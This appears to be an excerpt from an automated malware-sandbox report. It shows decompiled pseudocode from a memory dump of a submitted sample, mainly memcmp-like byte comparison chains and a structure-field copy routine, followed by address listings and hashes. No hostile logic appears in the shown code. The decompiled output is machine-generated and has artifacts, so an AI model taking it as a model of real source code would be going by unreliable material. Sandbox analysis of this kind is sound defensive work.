                    						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
                    						if(_t302 == 0) {
                    							L26:
                    							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
                    							if(_t304 == 0) {
                    								L28:
                    								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
                    								if(_t306 == 0) {
                    									L30:
                    									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
                    									if(_t231 != 0) {
                    										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                    									}
                    									goto L33;
                    								}
                    								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
                    								if(_t231 != 0) {
                    									goto L1;
                    								}
                    								goto L30;
                    							}
                    							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
                    							if(_t231 != 0) {
                    								goto L1;
                    							}
                    							goto L28;
                    						}
                    						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
                    						if(_t231 != 0) {
                    							goto L1;
                    						}
                    						goto L26;
                    					}
                    					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
                    					if(_t308 == 0) {
                    						L15:
                    						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
                    						if(_t310 == 0) {
                    							L17:
                    							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
                    							if(_t312 == 0) {
                    								L19:
                    								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
                    								if(_t231 != 0) {
                    									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                    								}
                    								goto L22;
                    							}
                    							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
                    							if(_t231 != 0) {
                    								goto L1;
                    							}
                    							goto L19;
                    						}
                    						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
                    						if(_t231 != 0) {
                    							goto L1;
                    						}
                    						goto L17;
                    					}
                    					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
                    					if(_t231 != 0) {
                    						goto L1;
                    					}
                    					goto L15;
                    				} else {
                    					__edi = __al & 0x000000ff;
                    					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                    					if(__edi == 0) {
                    						L4:
                    						__edi =  *(__esi - 0x1c) & 0x000000ff;
                    						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                    						if(__edi == 0) {
                    							L6:
                    							__edi =  *(__esi - 0x1b) & 0x000000ff;
                    							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                    							if(__edi == 0) {
                    								L8:
                    								__ecx =  *(__esi - 0x1a) & 0x000000ff;
                    								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
                    								if(__ecx != 0) {
                    									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                    								}
                    								goto L11;
                    							}
                    							0 = 0 | __edi > 0x00000000;
                    							__ecx = (__edi > 0) * 2 != 1;
                    							if((__edi > 0) * 2 != 1) {
                    								goto L1;
                    							}
                    							goto L8;
                    						}
                    						0 = 0 | __edi > 0x00000000;
                    						__ecx = (__edi > 0) * 2 != 1;
                    						if((__edi > 0) * 2 != 1) {
                    							goto L1;
                    						}
                    						goto L6;
                    					}
                    					0 = 0 | __edi > 0x00000000;
                    					__ecx = (__edi > 0) * 2 != 1;
                    					if((__edi > 0) * 2 != 1) {
                    						goto L1;
                    					}
                    					goto L4;
                    				}
                    				L1:
                    				_t184 = _t231;
                    				return _t184;
                    			}






























                    0x0043730e
                    0x0043730e
                    0x00437314
                    0x0043738b
                    0x0043738d
                    0x0043738f
                    0x00000000
                    0x00000000
                    0x00437395
                    0x0043739b
                    0x00437422
                    0x00437424
                    0x00437426
                    0x00000000
                    0x00000000
                    0x0043742c
                    0x00437432
                    0x004374b9
                    0x004374bb
                    0x004374bd
                    0x00000000
                    0x00000000
                    0x004374c3
                    0x004374c9
                    0x00437550
                    0x00437552
                    0x00437554
                    0x00000000
                    0x00000000
                    0x0043755a
                    0x00437560
                    0x004375e7
                    0x004375e9
                    0x004375eb
                    0x00000000
                    0x00000000
                    0x004375f7
                    0x0043767f
                    0x00437681
                    0x00437683
                    0x00000000
                    0x00000000
                    0x00437689
                    0x0043768f
                    0x00437716
                    0x00437718
                    0x0043771a
                    0x00437728
                    0x0043772a
                    0x00437737
                    0x00437737
                    0x0043772a
                    0x00000000
                    0x0043771a
                    0x0043769c
                    0x0043769e
                    0x004376b6
                    0x004376be
                    0x004376c0
                    0x004376d8
                    0x004376e0
                    0x004376e2
                    0x004376fa
                    0x00437702
                    0x00437704
                    0x0043770d
                    0x0043770d
                    0x00000000
                    0x00437704
                    0x004376eb
                    0x004376f4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004376f4
                    0x004376c9
                    0x004376d2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004376d2
                    0x004376a7
                    0x004376b0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004376b0
                    0x00437605
                    0x00437607
                    0x0043761f
                    0x00437627
                    0x00437629
                    0x00437641
                    0x00437649
                    0x0043764b
                    0x00437663
                    0x0043766b
                    0x0043766d
                    0x00437676
                    0x00437676
                    0x00000000
                    0x0043766d
                    0x00437654
                    0x0043765d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043765d
                    0x00437632
                    0x0043763b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043763b
                    0x00437610
                    0x00437619
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437619
                    0x0043756d
                    0x0043756f
                    0x00437587
                    0x0043758f
                    0x00437591
                    0x004375a9
                    0x004375b1
                    0x004375b3
                    0x004375cb
                    0x004375d3
                    0x004375d5
                    0x004375de
                    0x004375de
                    0x00000000
                    0x004375d5
                    0x004375bc
                    0x004375c5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004375c5
                    0x0043759a
                    0x004375a3
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004375a3
                    0x00437578
                    0x00437581
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437581
                    0x004374d6
                    0x004374d8
                    0x004374f0
                    0x004374f8
                    0x004374fa
                    0x00437512
                    0x0043751a
                    0x0043751c
                    0x00437534
                    0x0043753c
                    0x0043753e
                    0x00437547
                    0x00437547
                    0x00000000
                    0x0043753e
                    0x00437525
                    0x0043752e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043752e
                    0x00437503
                    0x0043750c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043750c
                    0x004374e1
                    0x004374ea
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004374ea
                    0x0043743f
                    0x00437441
                    0x00437459
                    0x00437461
                    0x00437463
                    0x0043747b
                    0x00437483
                    0x00437485
                    0x0043749d
                    0x004374a5
                    0x004374a7
                    0x004374b0
                    0x004374b0
                    0x00000000
                    0x004374a7
                    0x0043748e
                    0x00437497
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437497
                    0x0043746c
                    0x00437475
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437475
                    0x0043744a
                    0x00437453
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437453
                    0x004373a8
                    0x004373aa
                    0x004373c2
                    0x004373ca
                    0x004373cc
                    0x004373e4
                    0x004373ec
                    0x004373ee
                    0x00437406
                    0x0043740e
                    0x00437410
                    0x00437419
                    0x00437419
                    0x00000000
                    0x00437410
                    0x004373f7
                    0x00437400
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437400
                    0x004373d5
                    0x004373de
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004373de
                    0x004373b3
                    0x004373bc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437316
                    0x00437316
                    0x0043731d
                    0x0043731f
                    0x00437333
                    0x00437333
                    0x0043733b
                    0x0043733d
                    0x00437351
                    0x00437351
                    0x00437359
                    0x0043735b
                    0x0043736f
                    0x0043736f
                    0x00437377
                    0x00437379
                    0x00437382
                    0x00437382
                    0x00000000
                    0x00437379
                    0x00437361
                    0x00437364
                    0x0043736d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043736d
                    0x00437343
                    0x00437346
                    0x0043734f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043734f
                    0x00437325
                    0x00437328
                    0x00437331
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437331
                    0x00437306
                    0x00437306
                    0x004380f7

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                    • Instruction ID: 9d61dd9389370efbecfe11b7e252db46419b6e2e07a4e636dacc1fdb668e1936
                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                    • Instruction Fuzzy Hash: B4C1A1B22090934ADB3E4639853453FBAA15BA57B170A275EDCF3CB2C4FF18D524E624
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00436EF6(void* __edx, void* __esi) {
                    				signed char _t177;
                    				void* _t178;
                    				signed char _t179;
                    				signed char _t180;
                    				signed char _t181;
                    				signed char _t183;
                    				signed char _t184;
                    				void* _t228;
                    				void* _t278;
                    				void* _t281;
                    				void* _t283;
                    				void* _t285;
                    				void* _t287;
                    				void* _t289;
                    				void* _t291;
                    				void* _t293;
                    				void* _t295;
                    				void* _t297;
                    				void* _t299;
                    				void* _t301;
                    				void* _t303;
                    				void* _t305;
                    				void* _t307;
                    				void* _t309;
                    				void* _t311;
                    				void* _t313;
                    				void* _t315;
                    				void* _t317;
                    				void* _t319;
                    				void* _t321;
                    				void* _t322;
                    
                    				_t322 = __esi;
                    				_t278 = __edx;
                    				_t177 =  *(__esi - 0x1c);
                    				if(_t177 ==  *(__edx - 0x1c)) {
                    					_t228 = 0;
                    					L10:
                    					if(_t228 != 0) {
                    						L78:
                    						_t178 = _t228;
                    						return _t178;
                    					}
                    					_t179 =  *(_t322 - 0x18);
                    					if(_t179 ==  *(_t278 - 0x18)) {
                    						_t228 = 0;
                    						L21:
                    						if(_t228 != 0) {
                    							goto L78;
                    						}
                    						_t180 =  *(_t322 - 0x14);
                    						if(_t180 ==  *(_t278 - 0x14)) {
                    							_t228 = 0;
                    							L32:
                    							if(_t228 != 0) {
                    								goto L78;
                    							}
                    							_t181 =  *(_t322 - 0x10);
                    							if(_t181 ==  *(_t278 - 0x10)) {
                    								_t228 = 0;
                    								L43:
                    								if(_t228 != 0) {
                    									goto L78;
                    								}
                    								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
                    									_t228 = 0;
                    									L54:
                    									if(_t228 != 0) {
                    										goto L78;
                    									}
                    									_t183 =  *(_t322 - 8);
                    									if(_t183 ==  *(_t278 - 8)) {
                    										_t228 = 0;
                    										L65:
                    										if(_t228 != 0) {
                    											goto L78;
                    										}
                    										_t184 =  *(_t322 - 4);
                    										if(_t184 ==  *(_t278 - 4)) {
                    											_t228 = 0;
                    											L76:
                    											if(_t228 == 0) {
                    												_t228 = 0;
                    											}
                    											goto L78;
                    										}
                    										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
                    										if(_t281 == 0) {
                    											L69:
                    											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
                    											if(_t283 == 0) {
                    												L71:
                    												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
                    												if(_t285 == 0) {
                    													L73:
                    													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
                    													if(_t228 != 0) {
                    														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                    													}
                    													goto L76;
                    												}
                    												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
                    												if(_t228 != 0) {
                    													goto L78;
                    												}
                    												goto L73;
                    											}
                    											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
                    											if(_t228 != 0) {
                    												goto L78;
                    											}
                    											goto L71;
                    										}
                    										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
                    										if(_t228 != 0) {
                    											goto L78;
                    										}
                    										goto L69;
                    									}
                    									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
                    									if(_t287 == 0) {
                    										L58:
                    										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
                    										if(_t289 == 0) {
                    											L60:
                    											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
                    											if(_t291 == 0) {
                    												L62:
                    												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
                    												if(_t228 != 0) {
                    													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                    												}
                    												goto L65;
                    											}
                    											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
                    											if(_t228 != 0) {
                    												goto L78;
                    											}
                    											goto L62;
                    										}
                    										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
                    										if(_t228 != 0) {
                    											goto L78;
                    										}
                    										goto L60;
                    									}
                    									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
                    									if(_t228 != 0) {
                    										goto L78;
                    									}
                    									goto L58;
                    								}
                    								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
                    								if(_t293 == 0) {
                    									L47:
                    									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
                    									if(_t295 == 0) {
                    										L49:
                    										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
                    										if(_t297 == 0) {
                    											L51:
                    											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
                    											if(_t228 != 0) {
                    												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                    											}
                    											goto L54;
                    										}
                    										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
                    										if(_t228 != 0) {
                    											goto L78;
                    										}
                    										goto L51;
                    									}
                    									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
                    									if(_t228 != 0) {
                    										goto L78;
                    									}
                    									goto L49;
                    								}
                    								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
                    								if(_t228 != 0) {
                    									goto L78;
                    								}
                    								goto L47;
                    							}
                    							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
                    							if(_t299 == 0) {
                    								L36:
                    								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
                    								if(_t301 == 0) {
                    									L38:
                    									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
                    									if(_t303 == 0) {
                    										L40:
                    										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
                    										if(_t228 != 0) {
                    											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                    										}
                    										goto L43;
                    									}
                    									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
                    									if(_t228 != 0) {
                    										goto L78;
                    									}
                    									goto L40;
                    								}
                    								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
                    								if(_t228 != 0) {
                    									goto L78;
                    								}
                    								goto L38;
                    							}
                    							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
                    							if(_t228 != 0) {
                    								goto L78;
                    							}
                    							goto L36;
                    						}
                    						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
                    						if(_t305 == 0) {
                    							L25:
                    							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
                    							if(_t307 == 0) {
                    								L27:
                    								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
                    								if(_t309 == 0) {
                    									L29:
                    									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
                    									if(_t228 != 0) {
                    										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                    									}
                    									goto L32;
                    								}
                    								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
                    								if(_t228 != 0) {
                    									goto L78;
                    								}
                    								goto L29;
                    							}
                    							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
                    							if(_t228 != 0) {
                    								goto L78;
                    							}
                    							goto L27;
                    						}
                    						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
                    						if(_t228 != 0) {
                    							goto L78;
                    						}
                    						goto L25;
                    					}
                    					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
                    					if(_t311 == 0) {
                    						L14:
                    						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
                    						if(_t313 == 0) {
                    							L16:
                    							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
                    							if(_t315 == 0) {
                    								L18:
                    								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
                    								if(_t228 != 0) {
                    									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                    								}
                    								goto L21;
                    							}
                    							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
                    							if(_t228 != 0) {
                    								goto L78;
                    							}
                    							goto L18;
                    						}
                    						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
                    						if(_t228 != 0) {
                    							goto L78;
                    						}
                    						goto L16;
                    					}
                    					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
                    					if(_t228 != 0) {
                    						goto L78;
                    					}
                    					goto L14;
                    				}
                    				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                    				if(_t317 == 0) {
                    					L3:
                    					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
                    					if(_t319 == 0) {
                    						L5:
                    						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
                    						if(_t321 == 0) {
                    							L7:
                    							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
                    							if(_t228 != 0) {
                    								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                    							}
                    							goto L10;
                    						}
                    						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
                    						if(_t228 != 0) {
                    							goto L78;
                    						}
                    						goto L7;
                    					}
                    					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
                    					if(_t228 != 0) {
                    						goto L78;
                    					}
                    					goto L5;
                    				}
                    				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
                    				if(_t228 != 0) {
                    					goto L78;
                    				}
                    				goto L3;
                    			}


































                    0x00436ef6
                    0x00436ef6
                    0x00436ef6
                    0x00436efc
                    0x00436f83
                    0x00436f85
                    0x00436f87
                    0x00437306
                    0x00437306
                    0x004380f7
                    0x004380f7
                    0x00436f8d
                    0x00436f93
                    0x0043701a
                    0x0043701c
                    0x0043701e
                    0x00000000
                    0x00000000
                    0x00437024
                    0x0043702a
                    0x004370b1
                    0x004370b3
                    0x004370b5
                    0x00000000
                    0x00000000
                    0x004370bb
                    0x004370c1
                    0x00437148
                    0x0043714a
                    0x0043714c
                    0x00000000
                    0x00000000
                    0x00437158
                    0x004371e0
                    0x004371e2
                    0x004371e4
                    0x00000000
                    0x00000000
                    0x004371ea
                    0x004371f0
                    0x00437277
                    0x00437279
                    0x0043727b
                    0x00000000
                    0x00000000
                    0x00437281
                    0x00437287
                    0x004372fe
                    0x00437300
                    0x00437302
                    0x00437304
                    0x00437304
                    0x00000000
                    0x00437302
                    0x00437290
                    0x00437292
                    0x004372a6
                    0x004372ae
                    0x004372b0
                    0x004372c4
                    0x004372cc
                    0x004372ce
                    0x004372e2
                    0x004372ea
                    0x004372ec
                    0x004372f5
                    0x004372f5
                    0x00000000
                    0x004372ec
                    0x004372d7
                    0x004372e0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004372e0
                    0x004372b9
                    0x004372c2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004372c2
                    0x0043729b
                    0x004372a4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004372a4
                    0x004371fd
                    0x004371ff
                    0x00437217
                    0x0043721f
                    0x00437221
                    0x00437239
                    0x00437241
                    0x00437243
                    0x0043725b
                    0x00437263
                    0x00437265
                    0x0043726e
                    0x0043726e
                    0x00000000
                    0x00437265
                    0x0043724c
                    0x00437255
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437255
                    0x0043722a
                    0x00437233
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437233
                    0x00437208
                    0x00437211
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437211
                    0x00437166
                    0x00437168
                    0x00437180
                    0x00437188
                    0x0043718a
                    0x004371a2
                    0x004371aa
                    0x004371ac
                    0x004371c4
                    0x004371cc
                    0x004371ce
                    0x004371d7
                    0x004371d7
                    0x00000000
                    0x004371ce
                    0x004371b5
                    0x004371be
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004371be
                    0x00437193
                    0x0043719c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043719c
                    0x00437171
                    0x0043717a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043717a
                    0x004370ce
                    0x004370d0
                    0x004370e8
                    0x004370f0
                    0x004370f2
                    0x0043710a
                    0x00437112
                    0x00437114
                    0x0043712c
                    0x00437134
                    0x00437136
                    0x0043713f
                    0x0043713f
                    0x00000000
                    0x00437136
                    0x0043711d
                    0x00437126
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437126
                    0x004370fb
                    0x00437104
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437104
                    0x004370d9
                    0x004370e2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004370e2
                    0x00437037
                    0x00437039
                    0x00437051
                    0x00437059
                    0x0043705b
                    0x00437073
                    0x0043707b
                    0x0043707d
                    0x00437095
                    0x0043709d
                    0x0043709f
                    0x004370a8
                    0x004370a8
                    0x00000000
                    0x0043709f
                    0x00437086
                    0x0043708f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043708f
                    0x00437064
                    0x0043706d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043706d
                    0x00437042
                    0x0043704b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043704b
                    0x00436fa0
                    0x00436fa2
                    0x00436fba
                    0x00436fc2
                    0x00436fc4
                    0x00436fdc
                    0x00436fe4
                    0x00436fe6
                    0x00436ffe
                    0x00437006
                    0x00437008
                    0x00437011
                    0x00437011
                    0x00000000
                    0x00437008
                    0x00436fef
                    0x00436ff8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00436ff8
                    0x00436fcd
                    0x00436fd6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00436fd6
                    0x00436fab
                    0x00436fb4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00436fb4
                    0x00436f09
                    0x00436f0b
                    0x00436f23
                    0x00436f2b
                    0x00436f2d
                    0x00436f45
                    0x00436f4d
                    0x00436f4f
                    0x00436f67
                    0x00436f6f
                    0x00436f71
                    0x00436f7a
                    0x00436f7a
                    0x00000000
                    0x00436f71
                    0x00436f58
                    0x00436f61
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00436f61
                    0x00436f36
                    0x00436f3f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00436f3f
                    0x00436f14
                    0x00436f1d
                    0x00000000
                    0x00000000
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: ebeeb8421f25af2d539006ff062d5eeaae17c13ed81b6ba71763ad2f4137753b
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: DDC191B22090934ADF3E4639853453FBAA15BA67B171A276ED8F3CB2C4FE18C524D614
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E0041D580(intOrPtr* __ecx, intOrPtr* __edx, void* __esi) {
                    				void* __edi;
                    				void* _t100;
                    				void* _t102;
                    				intOrPtr* _t220;
                    				signed int _t226;
                    				signed int _t231;
                    				signed int _t234;
                    				signed int _t239;
                    				signed int _t242;
                    				signed int _t245;
                    				signed int _t249;
                    				signed int _t252;
                    				signed int _t262;
                    				signed int _t272;
                    				signed int _t275;
                    				signed int _t278;
                    				signed int _t281;
                    				signed int _t284;
                    				signed int _t287;
                    				void* _t290;
                    				intOrPtr _t292;
                    				void* _t296;
                    				signed int _t299;
                    				void* _t303;
                    				intOrPtr* _t304;
                    				void* _t305;
                    
                    				_t296 = __esi;
                    				_t264 = __edx;
                    				_t220 = __ecx;
                    				_t304 = __edx;
                    				if(__ecx == 0 || __edx == 0) {
                    					L14:
                    					return 0xffffff53;
                    				} else {
                    					_t292 =  *((intOrPtr*)(_t305 + 0x10));
                    					if( *((intOrPtr*)(__ecx + 4)) != 0 || _t292 != 0) {
                    						_t222 =  *_t220;
                    						if( *_t220 != 0) {
                    							E00420675(_t100, _t222, _t264, _t296);
                    						}
                    						_t102 = E0041D542(_t304, 1);
                    						if(_t102 < 0) {
                    							return _t102;
                    						} else {
                    							 *_t220 = _t304;
                    							_push(_t296);
                    							 *((short*)(_t220 + 0x220)) =  *((intOrPtr*)( *_t304));
                    							 *((short*)(_t220 + 0x388)) =  *((intOrPtr*)(_t304 + 0x80));
                    							 *((intOrPtr*)(_t220 + 0x374)) =  *((intOrPtr*)(_t304 + 0x7c));
                    							 *((intOrPtr*)(_t220 + 0x38c)) =  *((intOrPtr*)(_t304 + 0x84));
                    							 *((intOrPtr*)(_t220 + 0x20c)) =  *((intOrPtr*)(_t304 + 0x78));
                    							 *((intOrPtr*)(_t220 + 0x80)) =  *((intOrPtr*)(_t304 + 0x74));
                    							_t226 = ( *( *_t304 + 2) & 3) << 0x00000004 |  *(_t220 + 0x310) & 0x0000ffcf;
                    							 *(_t220 + 0x310) = _t226;
                    							_t299 = ( *( *_t304 + 3) & 1) << 0x0000000a | _t226 & 0x0000fbff;
                    							 *(_t220 + 0x310) = _t299;
                    							 *((char*)(_t220 + 0x31d)) =  *((intOrPtr*)(_t304 + 0x60));
                    							_t272 = ( *(_t304 + 0x5e) >> 0x00000002 & 1) << 0x00000008 |  *(_t220 + 0x312) & 0x0000feff;
                    							 *(_t220 + 0x312) = _t272;
                    							_t231 = ( *(_t304 + 0x5e) >> 0x00000003 & 1) << 0x00000009 | _t272 & 0x0000fdff;
                    							 *(_t220 + 0x312) = _t231;
                    							_t275 = ( *(_t304 + 0x5e) >> 0x00000004 & 1) << 0x0000000b | _t231 & 0x0000f7ff;
                    							 *(_t220 + 0x312) = _t275;
                    							_t234 = ( *(_t304 + 0x5e) >> 0x00000001 & 1) << 0x00000007 | _t275 & 0x0000ff7f;
                    							 *(_t220 + 0x312) = _t234;
                    							 *(_t220 + 0x312) = ( *(_t304 + 0x5e) >> 0x00000005 & 1) << 0x0000000c | _t234 & 0x0000efff;
                    							 *((short*)(_t220 + 0x324)) =  *((intOrPtr*)(_t304 + 0x62));
                    							 *((short*)(_t220 + 0x326)) =  *((intOrPtr*)(_t304 + 0x64));
                    							 *((short*)(_t220 + 0x32a)) =  *((intOrPtr*)(_t304 + 0x66));
                    							_t278 = ( *(_t304 + 0x5d) >> 0x00000004 & 1) << 0x00000002 | _t299 & 0x0000fffb;
                    							 *(_t220 + 0x310) = _t278;
                    							_t239 = ( *(_t304 + 0x5d) >> 0x00000005 & 1) << 0x00000003 | _t278 & 0x0000fff7;
                    							 *(_t220 + 0x310) = _t239;
                    							_t281 = ( *(_t304 + 0x5d) & 1) << 0x00000006 | _t239 & 0x0000ffbf;
                    							 *(_t220 + 0x310) = _t281;
                    							_t242 = ( *(_t304 + 0x5d) >> 0x00000001 & 1) << 0x00000007 | _t281 & 0x0000ff7f;
